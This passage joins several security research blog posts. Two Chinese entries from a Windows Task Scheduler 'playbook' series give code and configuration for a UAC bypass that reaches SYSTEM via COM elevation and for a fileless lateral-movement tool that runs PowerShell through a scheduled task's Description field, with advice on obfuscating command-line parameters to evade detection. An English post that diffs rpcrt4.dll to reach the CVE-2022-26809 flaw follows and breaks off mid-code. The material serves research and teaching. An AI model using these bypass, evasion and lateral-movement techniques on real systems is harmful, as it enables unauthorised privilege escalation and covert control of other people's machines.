            RtlInitUnicodeString(new IntPtr(pFlink.ToInt64() + (x86 ? 0x24 : 0x48)), fake2);
            RtlInitUnicodeString(new IntPtr(pFlink.ToInt64() + (x86 ? 0x2c : 0x58)), fake);
            LDR_DATA_TABLE_ENTRY = (LDR_DATA_TABLE_ENTRY)Marshal.PtrToStructure(pFlink, typeof(LDR_DATA_TABLE_ENTRY));
            break;
        }
    }
    catch { }
    pFlink = LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink;
} while (pFlink != first);

编译执行,不出意外的话我们将以提升后的身份运行xml中指定的命令(这里是cmd):

Advanced Windows TaskScheduler Playbook

至此,我们成功的发现了一个未公开的UAC Bypass

但这并不是结束。我们前面提到了修改XML文件Principal节点的值来注册以完整令牌运行的计划任务,而这个XML节点架构定义记录于MS-TSCH 2.5.6 Principal Schema Parthttps://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/b9420a4c-fe40-45a0-ae85-2d57e051409b

根据文档所述,Principal节点可包含子节点UserId,用于提供计划任务执行时的用户身份信息,其格式可以为用户名SIDUPNFQDN

所以我们可以在XML中指定UserIdSYSTEM

<Principals>
    <Principal id="Author">
      <UserId>SYSTEM</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
</Principals>

随后,我们指定的命令将直接以SYSTEM身份运行:

Advanced Windows TaskScheduler Playbook

即:我们通过一次无文件UACBypass直接获取到SYSTEM权限。

0x05 原理

至此,单纯的“安全研究”至武器化落地已经结束了。

但从纯粹知识的领域,这还不够。

请把思维暂时回溯至0x01 基础一节,重新打开MSDN,对比完整的目标注册表项,在最后来为本文补充一个最为重要的理论依据。

我们知道经过UAC提升的COM对象需要使用CoGetObject函数,结合Elevation Moniker进行激活,这个行为记录在https://docs.microsoft.com/en-us/windows/win32/com/the-com-elevation-moniker

参考文章代码,我们注意到在微软的示例中采用CLSCTX_LOCAL_SERVER作为激活上下文标记,这表示要求DCOMLaunch创建一个新的进程外COM对象,A6BFEA43-501F-456F-A845-983D3AD7B8F0对象仅配置了InProcServer32,这将导致代理激活(Surrogate Activation)https://docs.microsoft.com/en-us/windows/win32/com/registering-the-dll-server-for-surrogate-activation

关于代理激活有两个重要的点:首先从安全研究角度,配置了APPID的代理激活往往存在自定义权限检查。

参考文档https://docs.microsoft.com/en-us/windows/win32/com/launchpermissionhttps://docs.microsoft.com/en-us/windows/win32/com/accesspermission,默认隐式权限检查由注册表项HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{APPID}@LaunchPermissionHKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{APPID}@AccessPermission共同决定,其值为二进制格式表示的安全描述符Security Descriptor(SD) binary form

所以我们需要确认能够进行调用。二进制格式的安全描述符并非可读格式,采用Powershell进行解析后输出:

$x=get-itemproperty 'hklm:\software\classes\appid\{A6BFEA43-501F-456F-A845-983D3AD7B8F0}'
(new-object System.Security.AccessControl.RawSecurityDescriptor($x.LaunchPermission,0)).DiscretionaryAcl|fl
(new-object System.Security.AccessControl.RawSecurityDescriptor($x.AccessPermission,0)).DiscretionaryAcl|fl

将得到类似下面的结果:

BinaryLength       : 20
AceQualifier       : AccessAllowed
IsCallback         : False
OpaqueLength       : 0
AccessMask         : 3
SecurityIdentifier : S-1-5-4
AceType            : AccessAllowed
AceFlags           : None
IsInherited        : False
InheritanceFlags   : None
PropagationFlags   : None
AuditFlags         : None

参考https://docs.microsoft.com/en-us/windows/win32/secauthz/well-known-sidsS-1-5-4对应NT AUTHORITY\INTERACTIVE,任何通过交互式登录的用户都将授予该组身份,通过whoami /groups也能够确认这一点:

whoami /groups

组信息
-----------------

组名                                   类型   SID          属性
====================================== ====== ============ ==============================
Everyone                               已知组 S-1-1-0      必需的组, 启用于默认, 启用的组
NT AUTHORITY\本地帐户和管理员组成员    已知组 S-1-5-114    只用于拒绝的组
BUILTIN\Administrators                 别名   S-1-5-32-544 只用于拒绝的组
BUILTIN\Performance Log Users          别名   S-1-5-32-559 必需的组, 启用于默认, 启用的组
BUILTIN\Users                          别名   S-1-5-32-545 必需的组, 启用于默认, 启用的组
NT AUTHORITY\INTERACTIVE               已知组 S-1-5-4      必需的组, 启用于默认, 启用的组
CONSOLE LOGON                          已知组 S-1-2-1      必需的组, 启用于默认, 启用的组
NT AUTHORITY\Authenticated Users       已知组 S-1-5-11     必需的组, 启用于默认, 启用的组
NT AUTHORITY\This Organization         已知组 S-1-5-15     必需的组, 启用于默认, 启用的组
NT AUTHORITY\本地帐户                  已知组 S-1-5-113    必需的组, 启用于默认, 启用的组
LOCAL                                  已知组 S-1-2-0      必需的组, 启用于默认, 启用的组
NT AUTHORITY\NTLM Authentication       已知组 S-1-5-64-10  必需的组, 启用于默认, 启用的组
Mandatory Label\Medium Mandatory Level 标签   S-1-16-8192

所以,作为交互式登录的我们才有权限激活以及调用提升后的COM组件。

其次,从程序设计角度,我们查看关于COM Proxy的定义。按照https://docs.microsoft.com/en-us/windows/win32/com/proxy所述,代理对象驻留在调用方进程,充当远程对象的代理,在调用方看来,对代理对象的调用和直接调用真实对象并无区别。

这是一个完整的对象代理,应用且遵循代理模式,即代理对象的表现形式暴露方法调用方式与真实对象完全相同

从Web安全的角度,可以理解为ysoserial里面到处都在用的InvocationHandlerUtil返回的那个泛型对象,或是你用RetransformAgent劫持Tomcat FilterSpring Controller之后,为了不影响业务而做的那个Wrapper;从开发的角度,等同于你用过的任何AOP。

所以我们在0x04 调用所进行的操作可以翻译为:

1.我们要求COM激活器绑定至MonikerElevation:Administrator!new:{A6BFEA43-501F-456F-A845-983D3AD7B8F0}的对象,由于激活上下文标记为CLSCTX_LOCAL_SERVER,本地COM客户端(combase.dll)将请求DCOM服务,发送一个进程外(Out-Of-Process)提升的(Elevated)激活请求。
2.DCOM根据组件注册信息(registration info)激活上下文(Activation Context),确保A6BFEA43-501F-456F-A845-983D3AD7B8F0对象可以提升(实际上这里将调用AppInfo服务),且当前用户具备激活权限(存在包含已启用组S-1-5-4显式DACL)。
3.DCOM服务在新的(new)其他的(others)提升后的(elevated) 进程中进行激活(activation)操作,创建真实对象(Real Object)
4.DCOM通知本地COM客户端激活成功(HRESULT=S_OK),本地客户端在当前进程创建真实对象的代理(Proxy)作为实际通信目标。
5.当前进程在代理对象上调用实例方法,该方法实际上由远程对象进行处理。
6.根据方法签名,调用将返回新的ITaskService对象引用。由于ITaskService对象未实现额外的编组(Marshalling)接口,COM进行默认封装,返回远程对象引用(Remote Object Reference,ObjRef)
7.本地客户端在当前进程以代理对象(Proxy Object)形式创建ITaskService对象的代理(Proxy)
8.根据MSDN所述,对象远程引用在调用方(caller)等于真实对象;根据CLSID,真实对象是一个ITaskService
9.我们在未提升进程(unelevated process)中,获取到了在提升后进程(elevated process)ITaskService对象代理,任何对代理对象的操作都将无条件转发至真实对象。
10.创建带有TASK_RUNLEVEL_HIGHEST标记或其它任意用户(例如SYSTEM)运行的计划任务。完成UAC绕过。

如果你有耐心看到这里,请务必牢牢记住代理模式这个名词与其含义。我们在本文中见证了一个实际环境中的代理模式套娃,要理解这种模式背后的设计理念和思想,这个思想以后会用在你开发的每行代码、审计的每个功能以及测试的每个业务上。

到这里,我们可以回答0x00中提出的问题了:

1.确实存在一个未文档化的COM,能够根据我们可控制的方式调用计划任务组件。
2.这个组件配置了UAC提升,其通过默认COM代理,在提升后的代理进程内,根据已知的白名单CLSID,创建进程内COM对象;随后通过COM代理直接返回至调用方,供未提升的进程进行调用。
3.由于白名单中有且只有0f87369f-a4e5-4cfc-bd3e-73e6154572dd即计划任务(TaskService),导致未提升的进程可获取一个提升后的TaskService对象
4.通过调用此对象即可创建以完整权限运行的计划任务,实现UAC ByPass。

0x06 总结

这篇文章可以认为是从理论基础发散并落地到实战应用的开端。以前一篇微软文档化的MS-TSCH协议与XML作为基础,结合COM基础知识作为补全;随后发掘出有价值的研究目标,作为具有实战价值的工具与代码实现落地;最终我们重新梳理总结相关知识点,借本次这个实例重温关于COM诸多知识细节,并在实践中一一验证,实现“知识闭环”。

文章涉及的相关代码可以在https://github.com/zcgonvh/TaskSchedulerMisc/找到。虽然能够直接编译执行,但我依然不建议直接拿来使用,这对于能力提升并没有任何好处。
(另:请遵守刑法、网络安全法等相关规定,我只是单纯分享知识,任何使用不当造成的后果请自行承担)
请尊重开源协议 ,抄代码做“武器化”挺无聊的不是么)

当然,这篇文章并不全面,我们只是单纯的根据注册表,然后根据其功能找到了一个UAC Bypass。

而其他的多个角度,无论是继续进行0x01最后对计划任务的跟踪,或是重新对UAC乃至COM进行挖掘,从研究的角度看都有很多细节值得发散开来。

限于篇幅,一些拓展性质的思考将在后续某些系列中进行讲解。

最后,还是那句话,文章的目的是传递知识,论文形式的总结除了“让文章看起来丰满”之外毫无意义。安全研究这种强知识导向的领域没有取巧,只有知识积累才是串联一切的根本,最终厚积薄发乃至蜕变。

希望这篇文章能在技术点之外为各位带来启发。

Advanced Windows Task Scheduler Playbook - Part.3 from RPC to lateral movement

0x00 问题

书接上文,在对计划任务组件本机调用的跟踪与研究下,我们将COMUACITaskService进行了巧妙的结合,从而成功地找到了一个新的UAC Bypass,或者说一个新的攻击面。

现在,不妨继续拓宽思路。回顾第一篇,我们在研究的开始确认了计划任务程序的本质为以XML为数据载体的RPC接口。按照微软的说法,RPC用于“跨进程间调用,不论进程是否在同一台主机上”。

所以,基于RPC协议的计划任务天生可用来进行横向移动。

当然,这并不是什么新技术,作为没在八月初猝死的那一批,我们已经再次狠狠地把玩了一番atexecschtasks甚至更古老的at.exe。这些技巧无一例外利用了计划任务组件RPC接口进行横向移动。在已知的利用方式中,我们可以通过在远程执行命令,写入文件,最终通过共享目录进行读取的方式完成回显;或是通过诸多无文件手段直接上线。

而在实战中,这些或多或少会遇到一些问题。例如文件回显的技巧可能面临共享无法访问、SMB协议不兼容等诸多非常规环境;除了环境限制的因素之外,对抗环境下更多时候还要面临“已知”带来的威胁:一个已知的攻击方式或手法,一定有对应的检测。

这也就进一步导致了一个很实际的问题:

工具也好,武器也好,平台也罢,无论在理论环境下运行的多么完美,实战环境下总可能“不那么好用”。

探究新方法永远是对抗的第一课题。现在,基于实战环境下的需要,我们为自己找了一个新课题:如何实现更为稳定的横移回显/环境探测?

0x01 思考

安全研究绝不是盲目地解决问题。在这里,我们的最终目的是探索一个(某些环境下)相对更好的横向移动技术,技术问题往往能够很容易的分解为多个递进的步骤,所以可以继续细化一些:

横向移动存在哪些阶段?每个阶段中分别涉及哪些技术?每个技术细节存在哪些优劣?

顺着这样的思路来思考,就会带出下面的技术细节:

横向移动需要连接到目标,在网络层面则表现为协议,那么第一个子问题就是:
采用什么协议?

协议承载服务,非漏洞的横向移动本质上是服务功能的滥用,所以可以分解出第二个子问题:
我们能够使用服务本身提供的哪些功能,来获取执行权限?

成功获取执行权限后,实战环境下往往需要一个结果反馈,我们得到第三个子问题:
服务本身是否可以直接返回结果?如果不支持,那么需要额外采用哪些手段?

最后,则是实战环境经久不衰的老问题:
上述方式实现是否存在已知的特征?

将上述阶段串联起来,就是我们期望进行的完整流程。这个思路可以用反序列化链/ROP做对比,我们把整个步骤视作Chain,每一步中任意实现均视作独立且可连接的Gadget,对抗点视作黑名单,结合已知的知识,很容易得到类似这样一个简单且不完善的表格:

协议服务执行返回对抗点SMBATSVC命令文件共享cmd /c重定向、文件落地SMBSRVSVC服务文件共享cmd /c重定向、文件落地RPC/DCOMWMI命令/服务文件共享/注册表cmd /c重定向、SMB依赖、流量UUID

看,威胁情报和安全研究串起来了,Web和对抗也有了联系。

考虑到我们正在研究计划任务,那么随之思考:计划任务能否做到这一点?
根据我们前两篇文章的研究结果,不难回答这一问题:

1.MS-TSCH基于RPC,无法关闭且多数情况下允许访问。
2.ExecAction提供无限制的命令执行,写入文件与注册表后,ComHandlerAction提供无限制的代码执行。
3.协议内部通过UTF-16编码,将完整的XML定义以原样传输至客户端。其中Description元素可无限制放置任何字符串内容。

Advanced Windows TaskScheduler Playbook


4.流量层面仅能够通过UUID捕获握手包,直接报警/阻拦可能影响服务器管理;主机层面进程链全部为白名单ExecAction不支持输出重定向所以需要无文件手段;ComHandlerAction需要无文件手段或其他方式写入文件注册表

所以我们的表格可以添加下面并列的两项:

协议服务执行返回对抗点RPCTSCH命令原生协议流量UUID、无文件攻击检测RPCTSCH命令原生协议流量UUID、文件注册表落地

考虑复杂度,基于无文件的ExecAction显然优于需要大量落地的ComHandlerAction

所以,我们的问题从横向移动顺理成章地转换为无文件攻击对抗

而这项至少十年的技术利用方式非常成熟,变换手段非常多样化,也就意味着我们拥有很多顺畅的实现方式。在当前场景下,我们需要利用无文件攻击执行命令或进行信息探测,并在随后修改计划任务信息作为返回。
显然,各种基于脚本形式的无文件攻击都能做到这一点,例如mshta、各种形式的sctxsltcmd、以及PowerShell
首先排除cmd;其次,考虑到前几种基于Windows脚本宿主(Windows Script Hosting)的技术需要对外发起http或smb请求,而文件落地又容易引起某些不必要的问题。所以,通过命令行实现完整脚本功能的PowerShell成为首选。

0x02 实现

确认了技术要点,实现起来就完全没难度了。

首先,我们参考前两章的内容,无论是照抄MSDN示例、自己编译IDL、使用C# Interop等等均可直接实现连接至远程目标,要做的无非是在使用RPC时指定正确的Binding,并调用RpcBindingSetAuthInfoEx

_SEC_WINNT_AUTH_IDENTITY identity = { 0 };
LPWSTR domain = L"ROOT";
LPWSTR username = L"administrator";
LPWSTR password = L"P@ssw0rd";
identity.Domain = (unsigned short*)domain;
identity.DomainLength = lstrlenW(domain);
identity.Flags = SEC_WINNT_AUTH_IDENTITY_UNICODE;
identity.User = (unsigned short*)username;
identity.UserLength = lstrlenW(username);
identity.Password = (unsigned short*)password;
identity.PasswordLength = lstrlenW(password);
RpcBindingSetAuthInfoExW(hBinding, 0, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_WINNT, &identity, 0, (RPC_SECURITY_QOS*)&qos);

或是在调用ITaskService::Connect时指定凭据:

pService->Connect(_variant_t(L"Target"), _variant_t(L"administrator"),_variant_t(L"ROOT"), _variant_t("P@ssw0rd"));

(体会到抽象透明的好处了么)

其次,PowerShell提供了针对计划任务的完整对象模型,并提供了Get-ScheduledTaskSet-ScheduledTask等一系列Cmdlet进行操作。我们甚至不需要参考msdn,仅根据本地的cmdlet帮助文档就可以写出类似这样的脚本:

$task=Get-ScheduledTask -TaskName TestTask -TaskPath \;
$task.Description=(iex $task.Description|out-string);
Set-ScheduledTask $task;

在这段脚本中,我们通过Get-ScheduledTask获取到远程操控的对象,通过iex执行Description中保存的命令,考虑到PowerShell一切返回均为对象,所以采用out-string将结果转换为可读的字符串,最后进行保存。

Gadget思想的一个重点在于:如果gadget没错,将gadget串联的逻辑也没错,那么最终的结果一定是正确的。所以接下来,我们只需要创建一个计划任务,将XML/Task/RegistrationInfo/Description元素内容设置为要执行的命令,将名称设置为TestTask,将命令行指定为上面的PowerShell命令,运行这个计划任务,Description将变为命令结果。

Advanced Windows TaskScheduler Playbook

最后只要读取XML的内容,匹配出Description内容即可。

var xd=new XmlDocument();
xd.LoadXml(task.Xml);
Console.WriteLine(xd.SelectSingleNode("/*[local-name()='Task']/*[local-name()='RegistrationInfo']/*[local-name()='Description']").InnerText);

0x03 打磨

通过上面思考至落地的过程,我们有了一个可执行、有效果的技术原型,接下来进行打磨,使之更贴近实战“武器”的状态。

首先,我们利用ExecAction创建计划任务,这意味着需要使用命令行传参,所以最好使用-EncodedCommand。这实际上和opsec无关,主要目的是为了处理转义可能带来的一系列问题。

在对抗层面,我们知道PowerShell处理参数的逻辑是根据前缀执行不区分大小写的匹配,所以实际上-EncodedCommand除了常见的-e-enc,还有类似以下几万种写法:

-eN
-eNCo
-Encode
....

计划任务在后台运行,所以最好加上-NonInteractive,同样的,这个参数也有以下几万种写法:

-nonInt
-nOnInTe
....

对付一些没有词法分析的常规防御手段,这些基本上足够了。

接下来,由于我们在进行横向移动,所以并不能确定命令在目标环境的执行时间,所以需要加一个轮询。

轮询的退出条件绝不能睿智地直接判断是否修改了Description,这实际上也不是不能用,但在脚本出错的情况下等于死循环。

IRegisteredTask对象提供了表示当前任务状态的State属性,任务运行结束后将由Running变为Ready,所以只要轮询读取任务状态即可。

while (task.State != TaskState.Ready)
{
    task = folder.GetTask(taskname);
    Thread.Sleep(1000);
}

接着是一些锦上添花的可选opsec手段,因为命令内容中并没有常见的(我特指下载执行这个被很多规则视作Powershell唯一滥用方式的)强特征,所以几乎不用处理。

同样的,没什么杀软会扫任务计划的Description属性(无论对象内存还是Xml),所以默认不进行处理也是足够的。

当然,这些都是后续,等到这个方法被捕获了部分“强特征”,到时候处理一下iex,对返回命令进行编码就会变为新的对抗点等待挖掘。

最后,不要忘记iex实际上执行的是PowerShell脚本,所以,这是一个远程PowerShell(回忆一下WinRM),也就意味着我们不光可以执行命令行程序

Advanced Windows TaskScheduler Playbook

也可以执行任意Cmdlet

Advanced Windows TaskScheduler Playbook

甚至于更为复杂的脚本

Advanced Windows TaskScheduler Playbook

也即意味着,一切.Net能做到的事情,我们都能在远程(Remotly)无文件(fileless)无感知(undetectable)地进行操作。再进一步修改我们甚至能够做到真正基于MS-TSCH实现的交互式(Interactive)远程PowerShell。

(为什么上面说可能脚本出错?这里就是了)

0x04 反思

至此,和计划任务相关的内容基本结束了。接下来我们跳出计划任务角度,站在应用场景的角度来回顾曾经我们可用的方案。一方面做个简单的总结,另一方面,想一想如何合理地进行使用。

在横向移动这个场景下,除了漏洞与计划任务之外,最为经典好用的技术要数PsExecWMI这两种。

为什么PsExec经久不衰?除了微软签名带来曾经的opsec之外,还有着通过域环境下默认必须开启的SMB协议,实现了单协议的横移与回显结合的特点,所以在相当长的时间用作内网渗透的首选。哪怕是现在,基于Impacket或是API的自修改版PsExec依然能起到不俗的作用。

为什么后续换成WmiExec?因为WMI服务同样默认开启,且基本上不存在关闭的可能,通过stdregprov依然可以达到同协议回显的目的,从而变为基于DCOM协议横移的首选。

现在,我们多了基于RPC的taskexec这个技术选择。
是的,这仅仅是一个技术补充,而非替代品。

为什么?

因为每一种攻击技术,必定有着不同的应用范围/环境要求,同时必定存在各种各样的强特征
所有声称无感的(undetectable)绕过(bypass)/逃逸(evasion)方式,只是没有捕获强特征罢了
强特征意味着被检测、被追溯的可能。
但没有哪家产品敢于声称100%检测某一技术与其变种
也没有哪家产品能够做到100%无需人为判断/处置。
而且检测和追溯需要
更何况验证自动化的结果进行处置同样需要
在我们从钓鱼的变成钓鱼佬之前,几乎不可能见到这个场景下可以替代人工的AI大规模商用。

所以,每一个备选项在实战中,都是通向成功的一个Gadget。更深入一些,在最初0x01列出的mshtasctComHandler等等未选择的实现方式同样也是备选项,都是在实现基于任务计划的横向移动这一目的的过程中可用的Gadget。
甚至于将这些备选项重新组合,还能得到另外一大堆很好用的chain

而本文所述内容,则是在对抗-内网渗透-域-RPC这个更大的行为链条中的一个更大的gadget。

0x05 总结

这是本系列第三篇,我们从应用场景入手,随后进行可行性分析,接下来根据分析的内容进行原型实验,最后结合实战经验,打磨出一个全新的横向移动工具。

与人斗,其乐无穷。安全研究实质上是人与人之间的博弈,从纯粹技术的角度看来,每一个精通掌握的技术点都应当能够变为我们的Gadget储备,并结合我们长期积累的经验,在过程中动态地创造一条合理的Chain,最终在实战中发扬光大。

实战应用应当是知识的有机组合,不存在一劳永逸绝对成功的技巧,但知识的积累与理解能让我们更加轻松。

当然,如果你就是喜欢无脑12345,那权当我什么都没说

文章中的代码可以在Github找到,这次是一个没什么坑的原型,可以直接用,但最好自行修改一些特征防止撞车。

还是那句话,希望这篇文章能在技术点之外为各位带来启发。

To be continued....

CVE-2022-26809 Reaching Vulnerable Point starting from 0 Knowledge on RPC

By: s1ckb017
17 June 2022 at 00:00

Lately, along to malware analisys activity I started to study/test Windows to understand something more of its internals. The CVE here analyzed, has been a good opportunity to play with RPC and learn new funny things I never touched before and moreover it looked challenging enough to spent time.

This blogpost shows my roadmap to understand and reproduce the vulnerability, the analisys has the purpose just to arrive to a PoC of the vulnerability not to understand every bit of the RPC implementation neither to write an exploit for it.
RPC, for my basic knowlege, was just a way to call procedure remotely, e.g. client wants to execute a procedure in a server and get the result just like a syscall between user space and server space. This method allows in SW design to decouple goals and purpose and often lead to a good segregation of the permission. Despite this highly level, the RPC represented just another attack vector. The RPC protocol is implemented on top of various medium or transport protocols, e.g. pipes, UDP, TCP.
The vulnerability, as reported by Microsoft is an RCE on Remote Procedure Call. It’s not specified where is the bug, neither how to trigger it, so it is required to obtain the patch and diff it with a vulnerable version of the main library that implements the RPC, i.e. rpcrt4.dll.

Below is shown the exactly things I did to arrive to the vulnerable point, so the blogpost is more about finding a way without having complete knowledge of the analyzed object. Indeed the information I got about the RPC internals are shown here in a logic-time order so they are not represented in a structured way, as is usually done at the end of an analisys.

Search for the vulnerability

Before starting with the usual binary diff, it’s required to get the right windows version in order to get the vulnerble library. I was lucky, my FLARE mount Windows 10 version 21H2 that is vulnerable according to the cpe published by the NIST. Before patching the systems it’s required to download the windows symbols (PDB) just to have the Windows symbols in Ghidra.

Symbols Download

The symbols could be downloaded with the following commands, it’s required to have installed windows kits:

    cd "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\"
    .\symchk.exe  /s srv*c:\SYMBOLS*https://msdl.microsoft.com/download/symbols C:\Windows\System32\*.dll  


After, downloaded the symbols I opened the library rpcrt4.dll, that is supposed to be vulnerable, in Ghidra then resolved symbols loading the right PDB and exported the Binary for Bindiff.

The hash of my rpcrt4.dll library is: b35fdb8d452e39cdf4393c09530837eff01d33c7

Since my windows version is:

Vulnerable Windows Version


The patch to download, obtained from Microsoft, is the following:

Windows CVE-2022-26809 Patch


After applying the patch the system contains a new rpcrt4.dll having SHA1: d78a9d416a1187da8550fb0d5a4bace48cfa8179

Windows rpcrt4.dll after patch


Bindiff

In order to load into ghidra the patched library has been necessary to download again the symbols and import the new PDB. After this operation, the binaries, i.e. the vulnerable and the patched one, are exported for bindiff and a binary diff is executed on them.

In the following image it’s clear that the patch introduced new functions and some other are not available anymore.
Diffing Main Info

Indeed, only 97% of similarity with ~640 unmatched functions. Since I am not an expert of the RPC internals, I started investigate the differencies starting from the functions that have an high percent of similarity tending to 100%.

Low diff functions


I was lucky, the fix seems to be in the ProcessReceivedPDU() routine, indeed seems that in the new rpcrt4.dll version has been added a function to check the sum between two elements.

Vulnerability


So, seems that an integer overflow was the problem in the library.
Now, it’s required to find the answer to some questions:

  1. Is the fix introduced in other functions?
  2. How the bug could be reached, i.e. what we need to raise it?
  3. How to gain command execution?

The Patch

The fix has been introduced calling a function,i.e. UIntAdd(), to sum two items and check if integer overflow happened. The routine is very basic and it was present already in the vulnerable library but never called.

UIntAdd()


The fix, as can be shown by call reference has been applied to multiple routines but in the vulnerable code the routine is never used.

UIntAdd() call refs.


At this point, due to multiple usage of UIntAdd() introduced I could assume that the bug was an integer overflow but I was not sure about which routine is effectively reachable in a easy way for a newbe like me.

UIntAdd() call refs.


UIntAdd() call refs.


UIntAdd() call refs.


Search the way to reach the vulnerable point

Since my knowledge in RPC internals tending to 0 then for me the most easier approach was to build an RPC Client/Server example and sets some breakpoint on first instruction of the routines that contain the fix:

  1. void OSF_CCONNECTION: OSF_CCALL::ProcessReceivedPDU(OSF_CCALL *this,void *param_1,int param_2) - offset: BaseLibrary + 0x3ac7c
  2. long OSF_CCALL::GetCoalescedBuffer(OSF_CCALL *this,_RPC_MESSAGE *param_1) - offset BaseLibrary + 0xad10c
  3. long OSF_CCALL::ProcessResponse(OSF_CCALL *this,rpcconn_response *param_1,_RPC_MESSAGE *param_2,int *param_3) - offset: BaseLibrary + 0xae3f8
  4. long OSF_SCALL::GetCoalescedBuffer(OSF_SCALL *this,_RPC_MESSAGE *param_1,int param_2) - offset: BaseLibrary + 0xb35fc

The first example I run to check if the vulnerable code is reached in some way is a basic RPC client server with a Windows NT authentication and multiple kind of protocol selectable by arguments, the example used in this phase is visible at: Github

The github link above contains a basic server client RPC with customizable endpoint/protocol selection and basic authentication WINNT just on the connection, RPC_C_AUTHN_LEVEL_CONNECT.

The supported protocols are:

  1. ncacn_np - named pipes are the medium Doc
  2. ncacn_ip_tcp - TCP/IP is the stack on which the RPC messages are sent, indeed the endpoint is a server and port Doc
  3. ncacn_http - IIS is the protocol family, the endpoint is specified with just a port number Doc
  4. ncadg_ip_udp - UDP/IP is the protocol stack on which RPC messages are sent, this is obsolete.
  5. ncalrpc - the protocol is the local interprocess communication, the endpoint is specified with a string at most 53 bytes long Doc

In my initial tests, I run the example, RPCServerTest.exe 1 5000 using the TCP/IP as protocol in order to inspect packets with wireshark. The RPC is based on some transport protocol that can be different and on top there is of course a common protocol used to call remote procedure, i.e. passing parameters serialized and choosing the routine to execute.

So, I run the example via x64dbg and put the breakpoints in the main functions that were patched, using the following script:

$base_rpcrt4 = rpcrt4:base

$addr = $base_rpcrt4 + 0x3ac7c
lblset $addr, "OSF_SCALL::ProcessReceivedPDU_start"
bp $addr
log "Put BP on {addr} "

$addr = $base_rpcrt4 + 0xad10c
lblset $addr, "OSF_CCALL::GetCoalescedBuffer_start"
bp $addr
log "Put BP on {addr} "

$addr = $base_rpcrt4 + 0xae3f8
lblset $addr, "OSF_CCALL::ProcessResponse_start"
bp $addr
log "Put BP on {addr} "

$addr = $base_rpcrt4 + 0xb35fc
lblset $addr, "OSF_SCALL::GetCoalescedBuffer_start"
bp $addr
log "Put BP on {addr} "


Running the client, RPCClientTest.exe 1 5000, the execution stops at OSF_SCALL::ProcessReceivedPDU().

wir1


The only vulnerable function touched with the previous test is: OSF_SCALL::ProcessReceivedPDU() and it is reached when the client ask for executing the hello procedure. Now it’s required to understand what is passed as argument to the function as arguments, just by the name it’s possible to assume that the routine is called to process the Protocol Data Unit received.

OSF_SCALL::ProcessReceivedPDU()

In order to understand how the function is called and so which are the parameters passed it’s required to analize the functions in the stack trace. Below is shown how in the previous test is reached the vulnerable routine.

OSF_SCALL::ProcessReceivedPDU(OSF_SCALL *param_1,OSF_SCALL **param_2,byte *param_3,int param_4)
rpcrt4.dll + 0x3ac14 #  OSF_SCALL::BeginRpcCall(longlong *param_1,OSF_SCALL **param_2,OSF_SCALL **param_3)
rpcrt4.dll + 0x3d2ae #  void OSF_SCONNECTION::ProcessReceiveComplete(longlong *param_1,longlong *param_2,OSF_SCALL **param_3,ulonglong param_4)
rpcrt4.dll + 4c99c   #  void DispatchIOHelper(LOADABLE_TRANSPORT *param_1,int param_2,uint param_3,void *param_4, uint param_5,OSF_SCALL **param_6,void *param_7)
other libraries
...


wir2


The param1 of the OSF_SCALL::ProcessReceivedPDU() should be the class instance that maintain the status of the connection. The param2 of the OSF_SCALL::ProcessReceivedPDU() is just the tcp payload received from the client. The param3 of the OSF_SCALL::ProcessReceivedPDU() could be the tcp len field or the fragment len field, in any case seems that both are each time equals. The param4 of the OSF_SCALL::ProcessReceivedPDU() at first look should be something related the auth method choosen.

Unfortunately, seems that both param2 and param3 are passed directly to DispatchIOHelper() and as shown in the stack trace the dispatchIOHelper() is reached probably in some asynchronous way, maybe a thread wait for a messages from clients and start the dispatcher on every message received.

Before exploring the code I created a .h file containing the DCE RPC data structure in order to have a better view on ghidra.

 typedef struct
{
    char version_major;
    char version_minor;
    char pkt_type;
    char pkt_flags;
    unsigned int data_repres;
    unsigned short fragment_len;
    unsigned short auth_len;
    unsigned int call_id;
    unsigned int alloc_hint;
    unsigned short cxt_id;
    unsigned short opnum;
    char data[256]; // it should be .fragment_len - 24 bytes long
} dce_rpc_t;

Let’s explore the code to understand better what can be done and under which constraints.

The vulnerable code is the following:


In order to reach that part of the code is required to pass some check. It’s required to take this branch, this is taken every time. I don’t care why at the moment.


The following branches should not be taken, so the packet sent should be a REQUEST packet in order to avoid those branches.


It’s required to enter branch at 115 line, this is taken every time, maybe due to authentication.

The branch at line 117 in my tests is never taken.

The branch at line 119 should not be taken otherwise the data sent are overwritten, in order to not enter it’s required that the packet flags is not negative:

    8th bit the highest: Object <-- must be 0
    7th bit            : Maybe
    6th bit            : Did not execute
    5th bit            : Multiplex
    4th bit            : Reserved
    3th bit            : Cancel
    2th bit            : Last fragment
    1th bit            : First fragment

local_res18 is negative only if the highest bit is set, so in order to avoid that branch it’s required to not set Object flag.


It’s required to enter in the branch at line 128 so the packet sent should not be the first fragment and so it should not have the first fragment flag enabled. Since my tests until now have been conducted with this code Github, I decided to implement a client using Impacket library it is found here: Github.


Indeed with the initial test written in C, the al register, BP on base library + 0x3ad0e, containing the packet flags is set to 0x03, i.e. FIRST_FRAG & LAST_FRAG


On the second packet received with the impacket client al register contains 0 because the middle packet is not the first and neither the last of course.


The branch at line 130 is taken anytime, but the one at line 134 is never taken with any client. Not digged inside conditions that I did not need to bypass*

So, it’s required to force the following conditions :

if ((*(int *)(this + 0x244) == 0) || (*(int *)(this + 0x1cc) != 0))


To avoid the branch this+0x244 should be not 0 and this + 0x1cc should be 0. this+0x244 is set to 1 in the function void OSF_SCALL::BeginRpcCall(longlong *param_1,dce_rpc_t *tcp_payl,OSF_SCALL **param_3):baselibrary+0x8e806.


I focused on the *plVar3 + 0x38 value because *this +0x244 is zeroed every time in ActivateCall(), called from BeginRpcCall().


OSF_SCONNECTION::LookupBinding() just walks a list until it finds the second parameter that corresponds to context id passed in the dce rpc packet.

OSF_SBINDING * __thiscall OSF_SCONNECTION::LookupBinding(OSF_SCONNECTION *this,ushort param_1)

{
  OSF_SBINDING *pOVar1;
  SIMPLE_DICT *this_00;
  ulonglong uVar2;
  uint local_res8 [8];
  
  local_res8[0] = 0;
  this_00 = (SIMPLE_DICT *)(this + 0x80);
  uVar2 = (ulonglong)param_1;
  do {
    pOVar1 = (OSF_SBINDING *)SIMPLE_DICT::Next(this_00,local_res8);
